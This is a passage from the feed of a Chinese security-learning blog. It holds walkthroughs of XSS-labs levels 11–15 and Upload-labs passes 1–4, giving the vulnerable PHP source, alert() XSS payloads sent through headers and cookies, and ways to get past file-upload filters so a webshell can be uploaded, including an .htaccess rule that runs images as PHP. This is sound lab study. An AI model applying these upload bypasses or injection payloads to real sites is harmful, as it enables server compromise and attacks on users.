class="meta">?></span></span><br></pre></td></tr></table></figure><p>关键:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$str11=$_SERVER[<span class="string">'HTTP_REFERER'</span>];<span class="comment">//获取HTTP中referer信息</span></span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><input name=<span class="string">"t_ref"</span> value=<span class="string">"'.$str33.'"</span> type=<span class="string">"hidden"</span>></span><br></pre></td></tr></table></figure><p>可对referer注入;</p><p>抓包,Referer处添加如下代码:</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer: <span class="string">"onclick=alert(1) type="</span>text<span class="string">"</span></span><br></pre></td></tr></table></figure><h3 id="第12关"><a href="#第12关" class="headerlink" title="第12关"></a>第12关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str00 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str11=$_SERVER[<span class="string">'HTTP_USER_AGENT'</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.htmlspecialchars($str00).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ua" value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>与11关类似,在user_agent处添加如下代码:</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">" onmouseover=alert(1) type="</span>text<span class="string">"</span></span><br></pre></td></tr></table></figure><h3 id="第13关"><a href="#第13关" class="headerlink" title="第13关"></a>第13关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">setcookie(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, time()+<span class="number">3600</span>);</span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str00 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str11=$_COOKIE[<span class="string">"user"</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.htmlspecialchars($str00).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_cook" value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>🐖:<a href="https://www.w3school.com.cn/php/func_http_setcookie.asp" target="_blank" rel="noopener">setcookie() 函数</a></p><blockquote><p>setcookie() 函数向客户端发送一个 HTTP cookie。</p></blockquote><p>关键:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">setcookie(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, time()+<span class="number">3600</span>);</span><br><span class="line">$str11=$_COOKIE[<span class="string">"user"</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><input name=<span class="string">"t_cook"</span> value=<span class="string">"'.$str33.'"</span> type=<span class="string">"hidden"</span>></span><br></pre></td></tr></table></figure><p>所以直接抓包修改cookie中的user值即可:</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user=<span class="string">" onclick=alert(1) type="</span>text<span class="string">"</span></span><br></pre></td></tr></table></figure><h3 id="第14关"><a href="#第14关" class="headerlink" title="第14关"></a>第14关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"src"</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<body><span class="ng-include:'</span>.htmlspecialchars($str).<span class="string">'"></span></body>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><blockquote><p>🐖:</p><p><strong>ng-include</strong> 指令用于包含外部的 HTML 文件。</p><p>包含的内容将作为指定元素的子节点。</p><p><strong>ng-include</strong> 属性的值可以是一个表达式,返回一个文件名。</p><p>默认情况下,包含的文件需要包含在同一个域名下。</p></blockquote><p>利用文件包含,可构造如下payload:</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">src=level1.php?name=1'window.alert()</span><br></pre></td></tr></table></figure><h3 id="第15关"><a href="#第15关" class="headerlink" title="第15关"></a>第15关</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"script"</span>,<span class="string">"&nbsp;"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">" "</span>,<span class="string">"&nbsp;"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"/"</span>,<span class="string">"&nbsp;"</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">""</span>,<span class="string">"&nbsp;"</span>,$str4);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<center>"</span>.$str5.<span class="string">"</center>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>考虑使用编码绕过:</p><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">keyword=<img%<span class="number">0</span>dsrc=<span class="number">1</span>%<span class="number">0</span>donerror=alert()></span><br></pre></td></tr></table></figure><p>结束!</p><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> ,ad8888ba, <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> </span><br><span class="line"> d8<span class="string">"' `"</span><span class="number">8</span>b <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> </span><br><span class="line">d8' <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> <span class="number">88</span> </span><br><span class="line"><span class="number">88</span> ,adPPYba, ,adPPYba, ,adPPYb,<span class="number">88</span> <span class="number">88</span> ,adPPYba, <span class="number">88</span>,dPPYba, <span class="number">88</span> </span><br><span class="line"><span class="number">88</span> <span class="number">88888</span> a8<span class="string">" "</span><span class="number">8</span>a a8<span class="string">" "</span><span class="number">8</span>a a8<span class="string">" `Y88 88 a8"</span> <span class="string">"8a 88P' "</span><span class="number">8</span>a <span class="number">88</span> </span><br><span class="line">Y8, <span class="number">88</span> <span class="number">8</span>b d8 <span class="number">8</span>b d8 <span class="number">8</span>b <span class="number">88</span> <span class="number">88</span> <span class="number">8</span>b d8 <span class="number">88</span> d8 <span class="string">""</span> </span><br><span class="line"> Y8a. .a88 <span class="string">"8a, ,a8"</span> <span class="string">"8a, ,a8"</span> <span class="string">"8a, ,d88 88, ,d88 "</span><span class="number">8</span>a, ,a8<span class="string">" 88b, ,a8"</span> aa </span><br><span class="line"> `<span class="string">"Y88888P"</span> `<span class="string">"YbbdP"</span>' `<span class="string">"YbbdP"</span>' `<span class="string">"8bbdP"</span>Y8 <span class="string">"Y8888P"</span> `<span class="string">"YbbdP"</span>' <span class="number">8</span>Y<span class="string">"Ybbd8"</span>' <span class="number">88</span></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h3 id="第1关"><a href="#第1关" class="headerlink" title="第1关"></a>第1关</h3><p>输入变量被直接输出;</p>
<p>尝试:</p>
<figure class="highlight js"><table><tr>
</summary>
<category term="XSS" scheme="https://singlemindedt.github.io/tags/XSS/"/>
</entry>
<entry>
<title>文件包含漏洞</title>
<link href="https://singlemindedt.github.io/2020/08/04/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E-1/"/>
<id>https://singlemindedt.github.io/2020/08/04/文件包含漏洞-1/</id>
<published>2020-08-04T01:27:35.000Z</published>
<updated>2020-08-04T01:29:57.191Z</updated>
<content type="html"><![CDATA[<p><a href="https://www.jianshu.com/p/3514f0fd79f7" target="_blank" rel="noopener">文件包含漏洞学习总结</a></p>]]></content>
<summary type="html">
<p><a href="https://www.jianshu.com/p/3514f0fd79f7" target="_blank" rel="noopener">文件包含漏洞学习总结</a></p>
</summary>
</entry>
<entry>
<title>Upload-labs记录</title>
<link href="https://singlemindedt.github.io/2020/08/03/Upload-labs%E8%AE%B0%E5%BD%95/"/>
<id>https://singlemindedt.github.io/2020/08/03/Upload-labs记录/</id>
<published>2020-08-03T03:42:09.000Z</published>
<updated>2020-08-03T12:48:09.328Z</updated>
<content type="html"><![CDATA[<p><img src="https://s1.ax1x.com/2020/05/02/JvJadS.png" alt="JvJadS.png"></p><p><img src="https://s1.ax1x.com/2020/05/02/JvJYsP.png" alt="JvJYsP.png"></p><p>+++</p><h2 id="Pass-01"><a href="#Pass-01" class="headerlink" title="Pass-01"></a>Pass-01</h2><p><img src="https://s1.ax1x.com/2020/05/02/JvJJMt.png" alt="JvJJMt.png"></p><p>如图,要求我们上传一个webshell到服务器,并要求我们上传图片;</p><p>首先,我们上传任意文件试试:</p><p><img src="https://s1.ax1x.com/2020/05/02/JvJ8xI.png" alt="JvJ8xI.png"></p><p>提示我们,<strong>只能上传.jpg|.png|.gif类型的文件</strong>;</p><p>查看提示,“本pass在客户端使用js对不合法图片进行检查!”;</p><p>提示已经很明确了,该题目在客户端使用js过滤不合法后缀,我们只需要在上传时将文件改为合法后缀格式,然后抓包,再改包;</p><p>看看源码:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">function <span class="title">checkFile</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">var</span> file = document.getElementsByName(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="keyword">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> alert(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//提取上传文件的类型</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.indexOf(ext_name + <span class="string">"|"</span>) == -<span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> alert(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><ul><li>拦截方式:<strong>客户端js白名单检查</strong>;根据上传文件的后缀是否为.jpg|.png|.gif格式来判断文件能否上传;</li><li>绕过方式:将木马伪装成.jpg|.png|.gif文件,上传后burp拦截数据包,更改文件后缀为.php,再forward.</li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvJdIg.png" alt="JvJdIg.png"></p><p>改包:</p><p><img src="https://s1.ax1x.com/2020/05/02/JvJtqf.png" alt="JvJtqf.png"></p><p><strong>其他方法:</strong></p><ol><li><p>修改js脚本</p></li><li><p>浏览器禁止使用js脚本(火狐下🦊)</p><ul><li>在Firefox地址栏里输入“about:config”。在搜索栏输入“javascript.enabled”查找到首选项。点击鼠标右键选择“切换”,把“javascript.enabled”键值改为“false”</li></ul></li></ol><p>+++</p><h2 id="Pass-02"><a href="#Pass-02" class="headerlink" title="Pass-02"></a>Pass-02</h2><p>首先,尝试上传php文件,提示信息为:<strong>文件类型不正确,请重新上传!</strong>这次给的不是白名单或者黑名单,而是告诉我们文件类型不正确,应该为MIME的检查。</p><p>查看提示:</p><blockquote><p>提示:本pass在服务端对数据包的MIME进行检查!</p></blockquote><p><strong>补充:</strong><br>MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">常见的MIME类型(通用型):</span><br><span class="line">超文本标记语言文本 .html text/html</span><br><span class="line">xml文档 .xml text/xml</span><br><span class="line">XHTML文档 .xhtml application/xhtml+xml</span><br><span class="line">普通文本 .txt text/plain</span><br><span class="line">RTF文本 .rtf application/rtf</span><br><span class="line">PDF文档 .pdf application/pdf</span><br><span class="line">Microsoft Word文件 .word application/msword</span><br><span class="line">PNG图像 .png image/png</span><br><span class="line">GIF图形 .gif image/gif</span><br><span class="line">JPEG图形 .jpeg,.jpg image/jpeg</span><br><span class="line">au声音文件 .au audio/basic</span><br><span class="line">MIDI音乐文件 mid,.midi audio/midi,audio/x-midi</span><br><span class="line">RealAudio音乐文件 .ra, .ram audio/x-pn-realaudio</span><br><span class="line">MPEG文件 .mpg,.mpeg video/mpeg</span><br><span class="line">AVI文件 .avi video/x-msvideo</span><br><span class="line">GZIP文件 .gz application/x-gzip</span><br><span class="line">TAR文件 .tar application/x-tar</span><br><span class="line">任意的二进制数据 application/octet-stream</span><br></pre></td></tr></table></figure><p>+++</p><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> (($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || ($_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH . <span class="string">'/'</span> . $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><ul><li><p>拦截方式:<strong>服务端白名单</strong>;对文件的MIME(Multipurpose Internet Mail Extensions)进行了验证,只允许图片类文件上传通过</p></li><li><p>绕过方式:</p><ol><li><p>直接上传含木马的图片文件,burp截包,修改后缀为php文件</p></li><li><p>直接上传木马文件,burp抓包,修改Content-Type为image/png等允许类型</p></li></ol></li></ul><p>+++</p><p> 此处我们利用2修改Content-Type为image/png:<br>抓包:<br>[4]:()</p><p><img src="https://s1.ax1x.com/2020/05/02/JvJUZ8.png" alt="JvJUZ8.png"></p><p>改包:<br>[5]:()</p><p><img src="https://s1.ax1x.com/2020/05/02/JvRDfA.png" alt="JvRDfA.png"></p><p>发包:<br>文件上传成功,直接将文件拖出来即可得访问;</p><p><img src="https://s1.ax1x.com/2020/05/02/JvWp11.png" alt="JvWp11.png"></p><p>+++</p><h2 id="Psaa-03"><a href="#Psaa-03" class="headerlink" title="Psaa-03"></a>Psaa-03</h2><p>首先,尝试上传php文件,提示信息为:<strong>提示:不允许上传.asp,.aspx,.php,.jsp后缀文件!</strong></p><p>查看提示:</p><blockquote><p>本pass禁止上传.asp|.aspx|.php|.jsp后缀文件!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">'.asp'</span>,<span class="string">'.aspx'</span>,<span class="string">'.php'</span>,<span class="string">'.jsp'</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'不允许上传.asp,.aspx,.php,.jsp后缀文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>+++</p><ul><li><p>拦截方式:<strong>服务端黑名单验证</strong>;(禁止上传.asp|.aspx|.php|.jsp后缀文件)</p></li><li><p>绕过方式:<br>(1)可上传.php3.phtml .phps .php5 .pht…等这样可以被服务器解析的后缀名<br>(2)重写文件解析规则绕过,先上传一个.htaccess文件,再上传一个hack.png文件(含木马)<br>通过.htaccess文件调用php解析器去解析一个文件名中只要包含”hack.png”这个字符串的任意文件,无论扩展名是什么(没有也行),都以php的方式来解析<br>.htaccess文件内容:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"><FilesMatch "hack.png"></span></span><br><span class="line"><span class="attribute"><span class="nomarkup">SetHandler</span></span> application/x-httpd-php</span><br><span class="line"><span class="section"></FilesMatch></span></span><br></pre></td></tr></table></figure></li></ul><blockquote><p>application/x-httpd-php称MIME类型</p></blockquote><p>此处修改文件后缀为.php3;</p><p><img src="https://s1.ax1x.com/2020/05/02/JvR66P.png" alt="JvR66P.png"></p><p>上传成功!<br>+++</p><h2 id="Pass-04"><a href="#Pass-04" class="headerlink" title="Pass-04"></a>Pass-04</h2><p>首先,尝试上传php文件,提示信息为:<strong>提示:此文件不允许上传!</strong> </p><p>查看提示:</p><blockquote><p>本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">"php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">"pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span 